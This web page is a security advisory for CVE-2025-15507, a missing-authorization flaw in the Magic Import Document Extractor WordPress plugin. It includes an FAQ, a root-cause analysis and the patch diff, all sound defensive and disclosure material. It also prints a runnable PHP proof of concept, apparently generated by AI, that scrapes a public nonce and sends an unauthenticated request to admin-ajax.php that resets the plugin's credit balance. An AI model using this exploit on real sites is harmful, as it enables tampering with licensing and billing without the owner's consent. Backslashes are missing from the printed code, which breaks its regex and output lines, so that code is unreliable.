What is CVE-2025-15507?

CVE-2025-15507 is a medium severity vulnerability in the Magic Import Document Extractor plugin for WordPress, allowing unauthenticated attackers to modify the plugin’s license status and credit balance due to a missing authorization check in the ajax_sync_usage() function.

Who is affected by this vulnerability?

All users of the Magic Import Document Extractor plugin version 1.0.5 and earlier are affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, go to the WordPress admin dashboard, navigate to the ‘Plugins’ section, and look for the Magic Import Document Extractor plugin. If the version is 1.0.5 or earlier, your site is vulnerable.

How can I fix this vulnerability?

To fix this vulnerability, update the Magic Import Document Extractor plugin to version 1.0.6 or later. This version includes security patches that restrict access to the vulnerable functionality.

What is the risk level of CVE-2025-15507?

The CVSS score for CVE-2025-15507 is 5.3, categorized as medium severity. This indicates a moderate risk where successful exploitation could lead to unauthorized data modification, but does not directly compromise the entire site.

What does 'missing authorization' mean in this context?

‘Missing authorization’ means that the ajax_sync_usage() function does not verify whether the user has the necessary permissions before allowing them to modify sensitive data. This oversight allows unauthenticated users to exploit the function.

How does the proof of concept demonstrate the vulnerability?

The proof of concept demonstrates the vulnerability by showing how an attacker can send a crafted POST request to the AJAX endpoint without authentication, using a nonce obtained from the public-facing site. This allows them to modify the plugin’s license and credit balance.

What are the potential impacts of this vulnerability?

If exploited, this vulnerability can allow attackers to arbitrarily change the plugin’s reported credit balance and license status. This could lead to unauthorized use of paid features, disrupt billing, or create denial-of-service conditions.

What is a nonce and how is it used in this vulnerability?

A nonce is a security token used in WordPress to verify that requests come from a legitimate source. In this vulnerability, attackers can obtain a valid nonce from public pages, allowing them to bypass security checks when making unauthorized requests.

How does the patch address the vulnerability?

The patch for CVE-2025-15507 removes the unauthenticated AJAX hook registration and adds a capability check to the ajax_sync_usage() function. This ensures that only authenticated users with the ‘manage_options’ capability can access the function.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the plugin until a secure version is available. Additionally, review user permissions and restrict access to the WordPress admin area to minimize potential exploitation.

Where can I find more information about CVE-2025-15507?

More information about CVE-2025-15507 can be found on the official CVE database or security advisories related to the Magic Import Document Extractor plugin. Keeping up with security updates from plugin developers is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15507: Magic Import Document Extractor <= 1.0.5 – Missing Authorization to Unauthenticated Plugin License Status Modification (magic-import-document-extractor)

CVE ID CVE-2025-15507

Plugin magic-import-document-extractor

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.0.5

Patched Version 1.0.6

Disclosed February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15507:
This vulnerability is a Missing Authorization flaw in the Magic Import Document Extractor WordPress plugin. The flaw allows unauthenticated attackers to modify the plugin’s license status and credit balance. The vulnerability affects all plugin versions up to and including 1.0.5, with a CVSS score of 5.3.

The root cause is the plugin’s registration of the `ajax_sync_usage()` function to both authenticated and unauthenticated WordPress AJAX hooks. In the vulnerable file `magic-import-document-extractor/includes/class-magic-import-document-extractor.php` lines 46-48, the `loader->add_action()` function registers the `wp_ajax_nopriv_magic_import_document_extractor_sync_usage` hook. This hook allows requests without user authentication to reach the `ajax_sync_usage()` function in `public/class-public.php`. The function itself lacked any capability check to verify the user’s administrative privileges.

Exploitation requires sending a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The attacker must set the `action` parameter to `magic_import_document_extractor_sync_usage`. The request must also include a valid nonce in the `nonce` parameter and the `remaining` parameter containing the desired credit balance data. Attackers can obtain a valid nonce from the plugin’s public-facing pages, as the `check_ajax_referer()` call validates the nonce but does not enforce user roles.

The patch addresses the issue in two locations. First, in `class-magic-import-document-extractor.php`, the `wp_ajax_nopriv_` hook registration is removed, restricting the endpoint to authenticated users only. Second, in `public/class-public.php` within the `ajax_sync_usage()` function, a capability check `current_user_can( ‘manage_options’ )` is added. This check ensures only users with administrator privileges can execute the function. The plugin version is also incremented to 1.0.6.

Successful exploitation allows an attacker to arbitrarily set the plugin’s reported credit balance and license status. This could enable unauthorized use of paid API features beyond the allotted quota, disrupt administrative billing and usage tracking, or create a denial-of-service condition by depleting credits. The impact is limited to the plugin’s functionality and does not directly lead to full site compromise.

Differential between vulnerable and patched code

Code Diff

--- a/magic-import-document-extractor/includes/class-magic-import-document-extractor.php
+++ b/magic-import-document-extractor/includes/class-magic-import-document-extractor.php
@@ -46,8 +46,8 @@
         $this->loader->add_action('wp_enqueue_scripts', $plugin_public, 'enqueue_scripts');
         $this->loader->add_action('wp_ajax_magic_import_document_extractor_process', $plugin_public, 'ajax_process_document');
         $this->loader->add_action('wp_ajax_nopriv_magic_import_document_extractor_process', $plugin_public, 'ajax_process_document');
+        // Security: sync_usage is admin-only - no nopriv hook (CVE-2025-15507 fix)
         $this->loader->add_action('wp_ajax_magic_import_document_extractor_sync_usage', $plugin_public, 'ajax_sync_usage');
-        $this->loader->add_action('wp_ajax_nopriv_magic_import_document_extractor_sync_usage', $plugin_public, 'ajax_sync_usage');
     }

     public function run() {
--- a/magic-import-document-extractor/magic-import-document-extractor.php
+++ b/magic-import-document-extractor/magic-import-document-extractor.php
@@ -3,7 +3,7 @@
  * Plugin Name: Magic Import Document Extractor
  * Plugin URI: https://magicimport.ai
  * Description: AI-powered document extraction with multilingual support. Extract data from PDFs, Word docs, and images in 10+ languages including Greek, Spanish, French, German, Italian, Japanese, and Chinese. 10 free uploads per month.
- * Version: 1.0.5
+ * Version: 1.0.6
  * Author: Magic Import
  * License: GPL-2.0+
  * License URI: http://www.gnu.org/licenses/gpl-2.0.txt
@@ -21,7 +21,7 @@
 /**
  * Current plugin version.
  */
-define('MAGIC_IMPORT_DOCUMENT_EXTRACTOR_VERSION', '1.0.5');
+define('MAGIC_IMPORT_DOCUMENT_EXTRACTOR_VERSION', '1.0.6');
 define('MAGIC_IMPORT_DOCUMENT_EXTRACTOR_PLUGIN_DIR', plugin_dir_path(__FILE__));
 define('MAGIC_IMPORT_DOCUMENT_EXTRACTOR_PLUGIN_URL', plugin_dir_url(__FILE__));

--- a/magic-import-document-extractor/public/class-public.php
+++ b/magic-import-document-extractor/public/class-public.php
@@ -221,10 +221,18 @@

     /**
      * Persist refreshed usage totals from the Magic Import API so the admin UI stays accurate.
+     * Security: Requires administrator capability (CVE-2025-15507 fix).
      */
     public function ajax_sync_usage() {
         check_ajax_referer('magic_import_document_extractor_nonce', 'nonce');

+        // Security: Only administrators can modify license/credit settings
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( array(
+                'message' => __( 'You do not have permission to perform this action.', 'magic-import-document-extractor' ),
+            ), 403 );
+        }
+
         if (!isset($_POST['remaining'])) {
             wp_send_json_error(array(
                 'message' => __('Missing usage data.', 'magic-import-document-extractor'),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15507 - Magic Import Document Extractor <= 1.0.5 - Missing Authorization to Unauthenticated Plugin License Status Modification
<?php

$target_url = 'https://vulnerable-site.example.com';

// Step 1: Fetch a frontend page to extract the required nonce.
// The plugin's public JavaScript likely exposes the nonce.
$ch = curl_init($target_url . '/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract the nonce from the page source.
// This regex looks for the nonce variable in a script tag. The actual pattern may need adjustment.
$nonce = null;
if (preg_match('/magic_import_document_extractor_nonces*[=:]s*["']([a-f0-9]+)["']/', $response, $matches)) {
    $nonce = $matches[1];
}

if (!$nonce) {
    die('Could not extract nonce. The plugin may not be active or the page structure differs.');
}

// Step 3: Craft the exploit POST request to the AJAX endpoint.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'magic_import_document_extractor_sync_usage',
    'nonce' => $nonce,
    'remaining' => '9999' // Arbitrary credit count to set.
];

$ch = curl_init($ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Output the result.
echo "HTTP Code: $http_coden";
echo "Response: $resultn";

?>

Frequently Asked Questions

What is CVE-2025-15507?
Overview of the vulnerability
CVE-2025-15507 is a medium severity vulnerability in the Magic Import Document Extractor plugin for WordPress, allowing unauthenticated attackers to modify the plugin’s license status and credit balance due to a missing authorization check in the ajax_sync_usage() function.
Who is affected by this vulnerability?
Identifying vulnerable installations
All users of the Magic Import Document Extractor plugin version 1.0.5 and earlier are affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, go to the WordPress admin dashboard, navigate to the ‘Plugins’ section, and look for the Magic Import Document Extractor plugin. If the version is 1.0.5 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Updating the plugin
To fix this vulnerability, update the Magic Import Document Extractor plugin to version 1.0.6 or later. This version includes security patches that restrict access to the vulnerable functionality.
What is the risk level of CVE-2025-15507?
Understanding the CVSS score
The CVSS score for CVE-2025-15507 is 5.3, categorized as medium severity. This indicates a moderate risk where successful exploitation could lead to unauthorized data modification, but does not directly compromise the entire site.
What does 'missing authorization' mean in this context?
Explaining the vulnerability's nature
‘Missing authorization’ means that the ajax_sync_usage() function does not verify whether the user has the necessary permissions before allowing them to modify sensitive data. This oversight allows unauthenticated users to exploit the function.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploit process
The proof of concept demonstrates the vulnerability by showing how an attacker can send a crafted POST request to the AJAX endpoint without authentication, using a nonce obtained from the public-facing site. This allows them to modify the plugin’s license and credit balance.
What are the potential impacts of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can allow attackers to arbitrarily change the plugin’s reported credit balance and license status. This could lead to unauthorized use of paid features, disrupt billing, or create denial-of-service conditions.
What is a nonce and how is it used in this vulnerability?
Understanding nonce functionality
A nonce is a security token used in WordPress to verify that requests come from a legitimate source. In this vulnerability, attackers can obtain a valid nonce from public pages, allowing them to bypass security checks when making unauthorized requests.
How does the patch address the vulnerability?
Changes made in the updated version
The patch for CVE-2025-15507 removes the unauthenticated AJAX hook registration and adds a capability check to the ajax_sync_usage() function. This ensures that only authenticated users with the ‘manage_options’ capability can access the function.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the plugin until a secure version is available. Additionally, review user permissions and restrict access to the WordPress admin area to minimize potential exploitation.
Where can I find more information about CVE-2025-15507?
Further reading and resources
More information about CVE-2025-15507 can be found on the official CVE database or security advisories related to the Magic Import Document Extractor plugin. Keeping up with security updates from plugin developers is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations